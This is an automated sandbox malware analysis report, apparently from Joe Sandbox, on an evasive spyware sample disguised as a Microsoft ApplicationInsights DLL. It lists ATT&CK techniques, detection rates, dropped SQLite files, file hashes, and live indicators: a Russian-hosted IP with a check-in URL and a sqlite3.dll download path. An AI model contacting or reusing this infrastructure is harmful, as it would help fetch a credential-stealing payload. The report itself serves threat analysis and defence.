Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection12	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery44	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	Security Software Discovery121	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion1	Proc Filesystem	Process Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Microsoft.ApplicationInsights.PersistenceChannel.exe	40%	Virustotal		Browse
Microsoft.ApplicationInsights.PersistenceChannel.exe	29%	ReversingLabs	ByteCode-MSIL.Packed.Generic

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\sqlite3.dll	0%	Virustotal	Browse
C:\ProgramData\sqlite3.dll	0%	Metadefender	Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://77.222.42.92/goodnews.php	0%	Virustotal		Browse
http://77.222.42.92/goodnews.php	0%	Avira URL Cloud	safe
http://77.222.42.92/public/sqlite3.dll	0%	Virustotal		Browse
http://77.222.42.92/public/sqlite3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://77.222.42.92/goodnews.php	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.222.42.92/public/sqlite3.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://duckduckgo.com/chrome_newtab	XBAIMOPZ.2.dr	false	high
https://duckduckgo.com/ac/?q=	XBAIMOPZ.2.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	XBAIMOPZ.2.dr	false	high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://dc.services.visualstudio.com/v2/track	Microsoft.ApplicationInsights.PersistenceChannel.exe	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://dc.services.visualstudio.com/v2/trackY87C19923:	Microsoft.ApplicationInsights.PersistenceChannel.exe	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	XBAIMOPZ.2.dr	false	high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	XBAIMOPZ.2.dr	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.222.42.92	unknown	Russian Federation		44112	SWEB-ASRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	482276
Start date:	13.09.2021
Start time:	15:54:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 38s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.spyw.evad.winEXE@9/9@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.4% (good quality ratio 4%) Quality average: 79.5% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 104.208.16.94, 20.82.209.183, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:55:32	API Interceptor	1x Sleep call for process: Microsoft.ApplicationInsights.PersistenceChannel.exe modified
15:55:55	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SWEB-ASRU	60rUtFJPFb.exe	Get hash	malicious	Browse	77.222.40.7
	niberius.dll	Get hash	malicious	Browse	77.222.42.67
	0708_3355614568218.doc	Get hash	malicious	Browse	77.222.42.67
	triage_dropped_file.dll	Get hash	malicious	Browse	77.222.42.67
	08.jpg.exe	Get hash	malicious	Browse	77.222.42.67
	0708_5355150121.xll	Get hash	malicious	Browse	77.222.42.67
	triage_dropped_file.dll	Get hash	malicious	Browse	77.222.42.67
	nimb.dll	Get hash	malicious	Browse	77.222.42.67
	0706_1050501748839.doc	Get hash	malicious	Browse	77.222.42.67
	file.dll	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	file.dll	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	jax.k.dll	Get hash	malicious	Browse	77.222.52.246
	0526_28522894410229.doc	Get hash	malicious	Browse	77.222.52.246
	0526_1488782409783.doc	Get hash	malicious	Browse	77.222.52.246
	0526_17568640710485.doc	Get hash	malicious	Browse	77.222.52.246
	0526_4618771472215.doc	Get hash	malicious	Browse	77.222.52.246
	0526_1488782409783.doc	Get hash	malicious	Browse	77.222.52.246

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\sqlite3.dll	udG4T5U4kw.exe	Get hash	malicious	Browse
	WokOkognUw.exe	Get hash	malicious	Browse
	X6X2S4kxwQ.exe	Get hash	malicious	Browse
	qRtrAMES4f.exe	Get hash	malicious	Browse
	Xf74ZwnlqG.exe	Get hash	malicious	Browse
	7VL1FdrppM.exe	Get hash	malicious	Browse
	tuIqmXpga8.exe	Get hash	malicious	Browse
	7GU1k5rzf0.exe	Get hash	malicious	Browse
	IatYsx7ZOR.exe	Get hash	malicious	Browse
	9Q4LJz7clJ.exe	Get hash	malicious	Browse
	Purchase order.exe	Get hash	malicious	Browse
	PaymentAdvice.exe	Get hash	malicious	Browse
	XB0SQoadK4.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-genTrj.14465.exe	Get hash	malicious	Browse
	DcyCBedo25.exe	Get hash	malicious	Browse
	F2kvZ2vpfP.exe	Get hash	malicious	Browse
	37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exe	Get hash	malicious	Browse
	Payment_Advice.exe	Get hash	malicious	Browse
	fe0q9B7M7t.exe	Get hash	malicious	Browse
	0290FD4F9C7240911D9051F76167A75DD78834E6A03FA.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3AVJH2FWN4NV3EHF_2ef946da1f6452dd7dfcc2fa85c468c6437b1f_4630c9cb_145b58bf\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	14574
Entropy (8bit):	3.7684172249186663
Encrypted:	false
SSDEEP:	192:TRswJdrHBUZMXSaKOgMWS6/u7sNS274ItL6x:VlxBUZMXSaR6/u7sNX4ItLY
MD5:	CA680E3205A413318F5888EFBC365AEE
SHA1:	9B9C4513DD253CF0A7EFA31165447B2243EAFBD1
SHA-256:	5DE85C40BD46798A7F9DB1333080740EA5E9E2CE5FB1F3092EA09943D6D4CBB3
SHA-512:	139CFD922AA0BBB38CD335CF5B02E738F4FD73F0A9244462018E82B8F895F3CE4B8E5F8B8CF752F4DD1693884C7FFC8C32729F9F730E8B43E2329CB7FC38662C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.0.1.4.9.4.6.3.1.7.6.2.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.0.1.4.9.5.4.1.1.4.5.4.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.5.9.5.a.4.3.-.5.c.b.d.-.4.e.1.f.-.9.4.8.0.-.5.e.0.d.6.7.2.b.5.c.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.c.8.b.b.6.7.-.6.4.f.2.-.4.d.1.3.-.b.1.a.1.-.e.4.b.e.e.4.4.e.8.4.1.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.i.c.r.o.s.o.f.t...A.p.p.l.i.c.a.t.i.o.n.I.n.s.i.g.h.t.s...P.e.r.s.i.s.t.e.n.c.e.C.h.a.n.n.e.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...A.p.p.l.i.c.a.t.i.o.n.I.n.s.i.g.h.t.s...P.e.r.s.i.s.t.e.n.c.e.C.h.a.n.n.e.l...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.b.-.a.d.f.7.-.7.a.0.2.a.7.a.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Sep 13 13:55:48 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	261145
Entropy (8bit):	4.464836824461755
Encrypted:	false
SSDEEP:	3072:9RD6Bo106jd+p+W0H+pYUCgUhoU9gIOgF5WbmYMaPcPsPcPfIl:qBY03p+WmTTjhh9RpDATcPsPcPs
MD5:	32E344E2BCBC92BEACC81C43319162F4
SHA1:	8F796EB6BF2EC4AB1755492F34F6749F768FB3EB
SHA-256:	E43C14BA87ABF3E58A92817493A3D536760548FEB052D4E550484BFC925C3AB7
SHA-512:	51CA3A2F596A75C21FFE632B14B48AC9D7A39BD34BBC5C36B56B7A92F4D9041CBF0351B30762DE075E0847B34BF8BB5FB311D0F95EEDF05C7F1C54F133C0E19C
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......dX?a...................U...........B......$"......GenuineIntelW...........T...........PX?a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCDC.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8522
Entropy (8bit):	3.7093720804268924
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6363s6YrhSUNP8XgmfZdSW+prY89bf4sfvVm:RrlsNiC6c6YtSUNP8XgmfDSvfrfg
MD5:	B3482E097EF750D898B065BCD1E4CB62
SHA1:	15951AB73377B8A3F04AF2809FB73AC77D639672
SHA-256:	C3D827083C0C276A20CE9559838906A5ED8BEBF194500E1BFE56EE61B76120F5
SHA-512:	3E1222A851FD45297D085A6DFF80726C8884E35BEC308134BEACAF8622017CA4C99D6C24FF28221E8851131E0A14F1F97BCDCD97B432FD911FF5DBA01D4DAD0F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFFA.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4943
Entropy (8bit):	4.5792997437070975
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9YuWSC8BC8fm8M4JAh/ea01F1+q8vZea07I+5uhn1hn7hgd:uITfhjPSNtJAkBKcfI+5uh1h7Od
MD5:	725E80DBA2CF1502948C72E2F676A5D8
SHA1:	3653934FBF2D3215AC8C0C67FC0A4B3659D9144D
SHA-256:	2527A5AC5B65323225B19938E8FB893493A696303F3F1EC28D4A13398301A918
SHA-512:	964DDD6A502905320B247838B09E515A84ABCD7071195EB819E8E51875808E4C273AAFB2475042B838BAFE2E9D4D248C957FAAB65A6237269EAF1231E81836FA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1164906" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: udG4T5U4kw.exe, Detection: malicious, Browse Filename: WokOkognUw.exe, Detection: malicious, Browse Filename: X6X2S4kxwQ.exe, Detection: malicious, Browse Filename: qRtrAMES4f.exe, Detection: malicious, Browse Filename: Xf74ZwnlqG.exe, Detection: malicious, Browse Filename: 7VL1FdrppM.exe, Detection: malicious, Browse Filename: tuIqmXpga8.exe, Detection: malicious, Browse Filename: 7GU1k5rzf0.exe, Detection: malicious, Browse Filename: IatYsx7ZOR.exe, Detection: malicious, Browse Filename: 9Q4LJz7clJ.exe, Detection: malicious, Browse Filename: Purchase order.exe, Detection: malicious, Browse Filename: PaymentAdvice.exe, Detection: malicious, Browse Filename: XB0SQoadK4.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-genTrj.14465.exe, Detection: malicious, Browse Filename: DcyCBedo25.exe, Detection: malicious, Browse Filename: F2kvZ2vpfP.exe, Detection: malicious, Browse Filename: 37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exe, Detection: malicious, Browse Filename: Payment_Advice.exe, Detection: malicious, Browse Filename: fe0q9B7M7t.exe, Detection: malicious, Browse Filename: 0290FD4F9C7240911D9051F76167A75DD78834E6A03FA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\Desktop\7QQ1NYCJ Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\OHLNY58Q Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5495302130315884
Encrypted:	false
SSDEEP:	192:El+bDo3irhnydVj3XBBE3uNBIy7OzlG4oNH:EWU3iVy/BBE3uNBI0olG4oN
MD5:	AC80CECBE5FDA443A75B84589780512A
SHA1:	5EC10058D516D2EDB15005C416DAB6994BDF0E1A
SHA-256:	84F482E5F257AD8D3DE250A6D834A4DC8EF497770D83553A46E93DE89AC6519B
SHA-512:	4A573E33ED4B15ED03FCE4953D0D5EB3488404E88E4FAE8EFB8A900F3437CB86AA419865FF0124832C7305BA69C8174A0424BF4C030039866F742576B56954CD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\XBAIMOPZ Download File
